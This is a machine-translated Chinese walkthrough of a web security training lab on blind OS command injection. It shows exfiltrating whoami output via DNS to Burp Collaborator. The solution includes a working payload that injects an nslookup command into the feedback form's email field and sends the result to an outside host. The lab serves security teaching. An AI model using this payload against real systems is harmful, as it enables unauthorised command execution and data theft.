实验室:盲卫操作系统指挥注入带外数据exfiltration
从业者
这个实验室包含一个盲人OS命令注入反馈功能中的漏洞。
应用程序执行包含用户提供的详细信息的shell命令。命令以异步执行,对应用程序的响应没有影响。无法将输出重定向到可以访问的位置。但是,您可以触发与外部域的带外交互。
要解决实验室,请执行我是谁
命令并通过DNS查询释放输出到Burp Collaborator。您需要输入当前用户的名称以完成实验室。
笔记
为防止学院平台用于攻击第三方,我们的防火墙会阻止实验室和任意外部系统之间的交互。要解决实验室,必须使用Burp Collaborator的默认公共服务器(Burpcollaborator.net.
)。
解决方案
- 采用Burp Suite Professional.拦截和修改提交反馈的请求。
- 转到Burp菜单,并启动Burp Collaborator客户端。
- 单击“复制到剪贴板”以将唯一的Burp Collaborator有效载荷复制到剪贴板。将Burp Collaborator客户端窗口打开。
修改电子邮件
参数,将其更改为以下内容,但在其中插入Burp Collaborator子域,其中指示:
电子邮件= || nslookup +`whoami`.your-subdomain-here.burpcollaborator.net ||
- 返回Burp Collaborator客户端窗口,然后单击“立即轮询”。您应该看到应用程序发起的某些DNS交互,作为有效载荷的结果。如果您没有看到列出的任何交互,请等待几秒钟,然后重试,因为服务器端命令是异步执行的。
- 观察到命令的输出显示在交互的子域中,您可以在Burp Collaborator客户端中查看此内容。查找的完整域名显示在“交互的”描述“选项卡中。
- 要完成实验室,请输入当前用户的名称。